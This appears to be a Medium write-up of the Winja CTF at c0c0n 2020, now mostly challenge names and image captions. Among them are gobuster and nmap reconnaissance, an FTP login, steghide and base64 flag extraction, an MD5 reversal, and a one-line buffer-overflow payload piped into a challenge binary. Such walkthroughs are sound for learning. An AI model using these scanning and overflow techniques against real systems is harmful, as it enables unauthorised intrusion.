Winja CTF — c0c0n 2020 — Writeup

Winja CTF 2020

LEVEL 1

Trader’s Gambit 1
Gobuster Directory Bruteforce
Trader’s Gambit 2
Risk Aversion
file and Strings Output
Assembling it All Together: 1
bo-temp.js file
Assembling it All Together: 2
flag.js
Lock and Key
Extracted files
Metadata of alcohol.jpg
Steghide data of real_programmers.jpg
openssl rsautl -decrypt -in encrypted -out plaintext -inkey steganopayload26919.txt                                                                              Enter pass phrase for steganopayload26919.txt:RSA operation error
140538692908352:error:0406506C:rsa routines:rsa_ossl_private_decrypt:data greater than mod len:../crypto/rsa/rsa_ossl.c:400:
Flag in plaintextt
CSWheeee!
csv file with data
Col9 sorted
FTP FTW
Nmap port scan
ftp 192.168.1.104
Connected to 192.168.1.104.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.1.104]
Name (192.168.1.104:aravindha):
331 Password required for aravindha
Reverse shell

Level 2

Liar Liar
file this_is_a_binary 
this_is_a_binary: HTML document, ASCII text
echo "dGhlc2VfYXJlX2FsbF9pbnRlZ2VycyAweDY2LCAweDZjLCAweDYxLCAweDY3LCAweDdiLCAweDM4LCAweDczLCAweDc1LCAweDMzLCAweDZlLCAweDczLCAweDY4LCAweDVmLCAweDQ4LCAweDRmLCAweDRlLCAweDQ1LCAweDUzLCAweDU0LCAweDU5LCAweDVmLCAweDY5LCAweDczLCAweDVmLCAweDc0LCAweDY4LCAweDY1LCAweDVmLCAweDQyLCAweDY1LCAweDczLCAweDc0LCAweDVmLCAweDUwLCAweDZmLCAweDZjLCAweDY5LCAweDYzLCAweDc5LCAweDdkLCAweDBhCg==" | base64 -dthese_are_all_integers 0x66, 0x6c, 0x61, 0x67, 0x7b, 0x38, 0x73, 0x75, 0x33, 0x6e, 0x73, 0x68, 0x5f, 0x48, 0x4f, 0x4e, 0x45, 0x53, 0x54, 0x59, 0x5f, 0x69, 0x73, 0x5f, 0x74, 0x68, 0x65, 0x5f, 0x42, 0x65, 0x73, 0x74, 0x5f, 0x50, 0x6f, 0x6c, 0x69, 0x63, 0x79, 0x7d, 0x0a
Zipbomb
Password Cracking using JohntheRipper
#APictureSaysItAll
Instagram post
steghide extract -sf img.jpeg            
Enter passphrase: p@ssw@rd!234%

wrote extracted data to "flag.txt".
cat flag.txt
flag{the_team_Re@lLy_loved_Y@Ur_sk!ll3}
Sourcery
Github Repository https://github.com/ayushpriya10/dont-look-here
Gitleaks output
Flag
!_a_gold_digger
nmap 159.89.163.92               
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 07:58 IST
Nmap scan report for 159.89.163.92
Host is up (0.035s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp filtered telnet
25/tcp filtered smtp
53/tcp filtered domain
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
83/tcp open mit-ml-dev
179/tcp filtered bgp
Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds
DNS record of AXFR

LEVEL 3

F@#$ YOUR MIND
JSF*ck Decompiled
Jump the Shark
Each Reponse in pcap
strings file.pcap | grep "\"code\":\"valid\""
Hexdecimal to ASCII
AAAAAAAAAAATTACK
Radare 2 with afl
python -c "print 'A'*124 + '\xda\x50\x04\x00'" | ./a64.out
attack.log
Linux-virus request
The MD5 hash:
52c69e3a57331081823331c4e69d3f2e
was succesfully reversed into the string:
999999
flag at 999999 key
1 ❤ php

Secarmy Developer | CNSS | Cybersecurity Enthusiastic | CTF Player | InfoSec | Red-Hat Academy Student Ambassador |

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store